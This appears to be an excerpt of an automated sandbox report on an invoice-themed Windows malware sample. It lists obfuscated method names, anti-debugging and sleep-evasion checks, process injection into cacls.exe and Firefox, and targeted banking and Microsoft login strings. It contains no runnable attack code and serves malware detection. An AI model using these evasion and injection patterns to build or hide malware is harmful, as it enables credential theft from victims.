Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, aVKKOBMHnAN631LZaN.cs	High entropy of concatenated method names: 'TGhZJDmURb', 'A2RZrsZJK0', 'bPJZOk4pBm', 'dOgOEPLCXk', 'eEWOzOKKuM', 'exmZ94M670', 'ofCZ5NmQv1', 'v6qZquuEDb', 'ebtZSRK0fk', 'BkHZd1qERJ'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	High entropy of concatenated method names: 'SGDSLNWPCw', 'MSqSJpCI7o', 'tNpS8ITiTd', 'lNpSrDcBfH', 'BmgSy6xAQH', 'PL8SOtqvFZ', 'O9RSZEDZmC', 'JSCSbDslg6', 'N6wSCZr80t', 'LOOS1Y6hbo'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, Ep1iiUPZ9eVGuMqeAM.cs	High entropy of concatenated method names: 'BuWZTqlpUN', 'uyhZIRqvTm', 'xPxZGuMh3x', 'RpQZx5GpYx', 'CoNZs2Pr1y', 'UsHZulDhgV', 'jwNZARYJpP', 'Ww0ZY0DcYN', 'wrQZ782ula', 'tVFZvW1jRM'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, pRe6iEGYFy6rjPN2Fu.cs	High entropy of concatenated method names: 'C255ZsZSyo', 'yhF5bllatY', 'T9F518kZ7R', 'Lwy5Pj7u9s', 'H5x5wgda6G', 'bHR56qGElK', 'xcZX0Ru7XAOohVQfbR', 'UKa7YY3DanpgBMFBRZ', 'iUj55dhNhO', 'mUC5SlowUt'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, qDR1nokqdRKXT55LttR.cs	High entropy of concatenated method names: 'lj1cTPg7HP', 'JjFcInq3ix', 'Sl9cGNFE3i', 'TidcxjaA65', 'EYacsjGkRM', 'GDvcu1ajok', 'Hm0cAvlT5Q', 'opacY5Fib6', 'zvOc7EcHuK', 'd8ZcvC4xfH'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, cOTBnJXWhHoN3L5kKB.cs	High entropy of concatenated method names: 'k5vrxwNUyb', 'xOlruHfxc6', 'uB7rYVURmW', 'OWlr73BrZH', 'XuTrw3uZan', 'y2Gr6PKRcy', 'VRjrl7oMZZ', 'peDrM3mbj8', 'aPYrcvADSF', 'dWAroDIPwy'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, fy8m61vnZRqwT5qopV.cs	High entropy of concatenated method names: 'ToString', 'wSV6hws7K0', 'YPM6iItO4n', 'y9563Lh7nt', 'Jae6QfNrxe', 'T8Y6aBoqe3', 'trD6UppuJZ', 'BFS6FH6Cgy', 'g9V6Kk2Ut1', 'JqD6pHKLhu'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, i2sRDQQLDPWO0A5Knr.cs	High entropy of concatenated method names: 'pkq4YFu08A', 'jWi47LwPGY', 'e8N4VUp8y8', 'JPy4iutZy0', 'znE4QI6VGJ', 'YYM4aDYuvb', 'o9S4FL44dL', 'oC24K33JtO', 'esU4kx2lxu', 'TgQ4h261We'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, rdjnA5kHW6FVW1v22F5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WjIojideG0', 'PYtontZNTy', 'p1SoNKlMH3', 'qsUoWeWVuT', 'G2KoeiZKAY', 'Eb9oRuptvr', 'QRdo0uIdfK'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uP28d87bb3JInt4slZ.cs	High entropy of concatenated method names: 'iFiOLEkFbu', 'FowO8oxcmm', 'zTUOyyggSY', 'D3EOZi4XJE', 'UBlObZJK4g', 'MdNyeaZGBo', 'D8XyRfTBBQ', 'VQhy027nKb', 'qdKymNrSge', 'Xg5yDu0yUP'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, UcUWFu8W6ceNysrd4I.cs	High entropy of concatenated method names: 'YnaGGmBZ4', 'M8axDFF9O', 'BedujmrMZ', 'aBUAjXwI5', 'WTU7JTVGf', 'jUIvRjPL4', 'bXo48bPw3lANkaUnUo', 'A7ReepZ7pUtf0ITppJ', 'RhiMlkIFD', 'MXKoPdY6w'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, qyf5abrvsyY6ONiZon.cs	High entropy of concatenated method names: 'Ttbc5t2tFW', 'ungcS0WG6G', 'yZFcd9GBQ5', 'VYQcJ6JClo', 'o7oc8tWrlE', 'OWWcyF8V59', 'x8qcO60Pa5', 'RHpM07lkLR', 'ST3MmB6mHF', 'qNIMDl2rJU'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, LqaaTDCXXcs1Bkatoc.cs	High entropy of concatenated method names: 'KRPMVHggqf', 'f4EMiN41Xv', 'iGsM3cYMUJ', 'eiPMQlMf8p', 'xBNMj8aOEd', 'hZvMaIQGmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, tLsmDfm2sEXvEoepHD.cs	High entropy of concatenated method names: 'icUOgwaEkH', 'KIvOT0kRFd', 'g7VOG13hlW', 'TPPOxdx46W', 'XZ3Ou1PC0t', 'vbFOATYUXc', 'DTJO7Emecd', 'yEKOv4ZfB0', 'YHCP9M5i5fkUj6QwpSe', 'EPPgvx5HRs9BjQGiGlP'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, HRqAi5zo58cVIJcpge.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vY5c4EJ1CB', 'Hv4cwTYwY2', 'rj9c6totx1', 'oPIclRD4tj', 'w6AcMO9OWE', 'tC4ccrZBEG', 'UoOcoxtZCx'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, IqK8bsYVEt7haTtUqc.cs	High entropy of concatenated method names: 'PeU8j4GV4l', 'q9c8nild0U', 'tCD8NMVWDs', 'dGe8WJPKGb', 'Jds8eX6cXh', 'uEL8R6frcH', 'WLJ80Gh8Y0', 'mg28mYsYG3', 'Qbj8DecTBB', 'cKv8EGOI33'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, TOsVUbRsuCOcpGkcfD.cs	High entropy of concatenated method names: 'F8Ewk1Pgpo', 'XufwBSxkFG', 'erCwjytQXa', 'VL9wn8UV5V', 'lMRwiGYBWF', 'GXpw36PXP0', 'gr8wQsU9he', 'dWiwao1yuE', 'ohJwUA8uGy', 'KabwFwp2NC'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, lmy47KswpkjG5DQ3SN.cs	High entropy of concatenated method names: 'Dispose', 'jMJ5DG8n9i', 'TS1qi2822s', 'TQ0XXOnXYg', 'gUF5EV97RQ', 'GOt5zrVj8F', 'ProcessDialogKey', 'H8wq9SmPRh', 'x1kq5qeofQ', 'yETqqSYqU6'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, mPWDn6SsOiw3DbUmrS.cs	High entropy of concatenated method names: 'p74MJayRl6', 'ttZM8gsUDY', 'yKrMr6svkE', 'uWrMyQYKjh', 'vPSMOgMwlE', 'z0PMZISj5A', 'JKFMbRRnhm', 'cL1MCqms5B', 'JKcM1a2o1n', 'SrTMPJGVhC'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, aVKKOBMHnAN631LZaN.cs	High entropy of concatenated method names: 'TGhZJDmURb', 'A2RZrsZJK0', 'bPJZOk4pBm', 'dOgOEPLCXk', 'eEWOzOKKuM', 'exmZ94M670', 'ofCZ5NmQv1', 'v6qZquuEDb', 'ebtZSRK0fk', 'BkHZd1qERJ'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	High entropy of concatenated method names: 'SGDSLNWPCw', 'MSqSJpCI7o', 'tNpS8ITiTd', 'lNpSrDcBfH', 'BmgSy6xAQH', 'PL8SOtqvFZ', 'O9RSZEDZmC', 'JSCSbDslg6', 'N6wSCZr80t', 'LOOS1Y6hbo'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, Ep1iiUPZ9eVGuMqeAM.cs	High entropy of concatenated method names: 'BuWZTqlpUN', 'uyhZIRqvTm', 'xPxZGuMh3x', 'RpQZx5GpYx', 'CoNZs2Pr1y', 'UsHZulDhgV', 'jwNZARYJpP', 'Ww0ZY0DcYN', 'wrQZ782ula', 'tVFZvW1jRM'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, pRe6iEGYFy6rjPN2Fu.cs	High entropy of concatenated method names: 'C255ZsZSyo', 'yhF5bllatY', 'T9F518kZ7R', 'Lwy5Pj7u9s', 'H5x5wgda6G', 'bHR56qGElK', 'xcZX0Ru7XAOohVQfbR', 'UKa7YY3DanpgBMFBRZ', 'iUj55dhNhO', 'mUC5SlowUt'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, qDR1nokqdRKXT55LttR.cs	High entropy of concatenated method names: 'lj1cTPg7HP', 'JjFcInq3ix', 'Sl9cGNFE3i', 'TidcxjaA65', 'EYacsjGkRM', 'GDvcu1ajok', 'Hm0cAvlT5Q', 'opacY5Fib6', 'zvOc7EcHuK', 'd8ZcvC4xfH'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, cOTBnJXWhHoN3L5kKB.cs	High entropy of concatenated method names: 'k5vrxwNUyb', 'xOlruHfxc6', 'uB7rYVURmW', 'OWlr73BrZH', 'XuTrw3uZan', 'y2Gr6PKRcy', 'VRjrl7oMZZ', 'peDrM3mbj8', 'aPYrcvADSF', 'dWAroDIPwy'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, fy8m61vnZRqwT5qopV.cs	High entropy of concatenated method names: 'ToString', 'wSV6hws7K0', 'YPM6iItO4n', 'y9563Lh7nt', 'Jae6QfNrxe', 'T8Y6aBoqe3', 'trD6UppuJZ', 'BFS6FH6Cgy', 'g9V6Kk2Ut1', 'JqD6pHKLhu'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, i2sRDQQLDPWO0A5Knr.cs	High entropy of concatenated method names: 'pkq4YFu08A', 'jWi47LwPGY', 'e8N4VUp8y8', 'JPy4iutZy0', 'znE4QI6VGJ', 'YYM4aDYuvb', 'o9S4FL44dL', 'oC24K33JtO', 'esU4kx2lxu', 'TgQ4h261We'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, rdjnA5kHW6FVW1v22F5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WjIojideG0', 'PYtontZNTy', 'p1SoNKlMH3', 'qsUoWeWVuT', 'G2KoeiZKAY', 'Eb9oRuptvr', 'QRdo0uIdfK'
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uP28d87bb3JInt4slZ.cs	High entropy of concatenated method names: 'iFiOLEkFbu', 'FowO8oxcmm', 'zTUOyyggSY', 'D3EOZi4XJE', 'UBlObZJK4g', 'MdNyeaZGBo', 'D8XyRfTBBQ', 'VQhy027nKb', 'qdKymNrSge', 'Xg5yDu0yUP'

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\cacls.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: 1500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: 94B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: A4B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: A6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: B6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: C0F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Memory allocated: D0F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe	Window / User API: threadDelayed 3341			Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Window / User API: threadDelayed 6630			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\cacls.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe TID: 5796	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1432	Thread sleep count: 3341 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1432	Thread sleep time: -6682000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1432	Thread sleep count: 6630 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe TID: 1432	Thread sleep time: -13260000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe TID: 6712	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe TID: 6712	Thread sleep time: -31500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cacls.exe	Last function: Thread delayed

Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: n-T73hKo.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: n-T73hKo.12.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: n-T73hKo.12.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: n-T73hKo.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: n-T73hKo.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: n-T73hKo.12.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: cacls.exe, 0000000C.00000002.4647612526.0000000003181000.00000004.00000020.00020000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4647897379.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3379875211.0000014976D6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: n-T73hKo.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: n-T73hKo.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: n-T73hKo.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: n-T73hKo.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: n-T73hKo.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: n-T73hKo.12.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: n-T73hKo.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: n-T73hKo.12.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: n-T73hKo.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: n-T73hKo.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: n-T73hKo.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: n-T73hKo.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: n-T73hKo.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
